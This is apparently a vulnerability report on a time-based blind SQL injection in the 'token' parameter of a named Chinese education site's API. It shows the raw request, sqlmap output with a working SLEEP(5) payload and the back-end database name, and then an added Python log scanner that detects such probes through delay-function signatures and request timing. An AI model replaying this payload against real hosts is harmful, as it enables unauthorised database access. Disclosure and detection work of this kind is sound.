Injected parameter: token
 

GET /?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b*&clientType=1&mod=user&act=pushIOS HTTP/1.1
Host: pop.client.chuanke.com
Accept-Language: zh-cn
Connection: keep-alive
Accept: */*
User-Agent: ChuanKeIPhone/2.8.6 CFNetwork/672.1.14 Darwin/14.0.0
Host: pop.client.chuanke.com
Pragma: no-cache
Content-Type: text/html
DontTrackMeHere: gzip, deflate


 

[Screenshot: 屏幕快照 2016-04-13 19.57.11.png]

sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: https://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS
---
web application technology: PHP 5.3.13
back-end DBMS: MySQL 5.0.12

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: https://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS
---
web application technology: PHP 5.3.13
back-end DBMS: MySQL >= 5.0.0
current database: 'kk_portal'
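The injection sqlmap found above is time-based blind: the application returns the same page whether or not the injected condition holds, and the only observable signal is the delay introduced by SLEEP(5). That gives a defender two independent detection signals in ordinary access logs: the delay function in a decoded query parameter, and an unusually long request time on the same request. The following Python script is an added example written for this report, not code from the original page or from the affected site; it assumes an nginx/Apache combined log format with the request duration in seconds appended as the last field, and the log lines and token value in it are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Delay primitives used by time-based blind SQL injection probes, keyed by a short name.
TIME_BLIND_SIGNATURES = {
    "mysql_sleep": re.compile(r"\bsleep\s*\(", re.I),
    "mysql_benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "postgres_pg_sleep": re.compile(r"\bpg_sleep\s*\(", re.I),
    "mssql_waitfor": re.compile(r"\bwaitfor\s+delay\b", re.I),
}

# Assumed log layout: combined format plus request duration (seconds) as the last field.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ (?P<rt>\d+(?:\.\d+)?)$'
)

# Constructed sample log (not from the page). The token value is a placeholder.
# Line 2 carries the SLEEP(5) probe and really slept; line 3 carries a probe that
# did not delay (e.g. a parameter that is not injectable); line 4 is merely slow.
SAMPLE_LOG = """\
203.0.113.10 - - [13/Apr/2016:19:57:11 +0800] "GET /?token=0a1b2c3d4e5f60718293a4b5c6d7e8f9&clientType=1&mod=user&act=pushIOS HTTP/1.1" 200 512 0.021
203.0.113.10 - - [13/Apr/2016:19:57:12 +0800] "GET /?token=0a1b2c3d4e5f60718293a4b5c6d7e8f9%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))iUbS)%20AND%20%27ngyI%27%3D%27ngyI&clientType=1&mod=user&act=pushIOS HTTP/1.1" 200 512 5.034
203.0.113.10 - - [13/Apr/2016:19:57:18 +0800] "GET /?token=0a1b2c3d4e5f60718293a4b5c6d7e8f9%27%20AND%20SLEEP(5)%20AND%20%27x%27%3D%27x&clientType=1&mod=user&act=pushIOS HTTP/1.1" 200 512 0.019
198.51.100.7 - - [13/Apr/2016:19:58:02 +0800] "GET /?mod=course&act=list&page=2 HTTP/1.1" 200 4096 6.120
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match the layout."""
    m = LOG_LINE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    return rec


def injected_params(target):
    """Decode the query string and return (param, signature) pairs whose value carries a delay primitive."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        for sig_name, pattern in TIME_BLIND_SIGNATURES.items():
            if pattern.search(value):
                hits.append((name, sig_name))
                break
    return hits


def scan_log(text, slow_threshold=4.0):
    """Return findings combining payload signature and request duration.

    verdict is 'confirmed_delay' when a delay payload coincides with a slow request
    (the injection is likely live), 'payload_only' when the probe did not delay, and
    'slow_only' when the request was slow without any payload (needs other explanation).
    """
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = injected_params(rec["target"])
        slow = rec["rt"] >= slow_threshold
        if not hits and not slow:
            continue
        if hits and slow:
            verdict = "confirmed_delay"
        elif hits:
            verdict = "payload_only"
        else:
            verdict = "slow_only"
        findings.append({
            "ip": rec["ip"], "ts": rec["ts"], "params": hits,
            "rt": rec["rt"], "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} rt={f['rt']:.3f}s {f['verdict']} {f['params']}")
```

The threshold should sit below the delay the probe requests (sqlmap defaults to 5 seconds) but above the endpoint's normal latency; a "slow_only" hit on its own is not evidence of injection, while "confirmed_delay" on a parameter such as token is worth an immediate look at the query that consumes it.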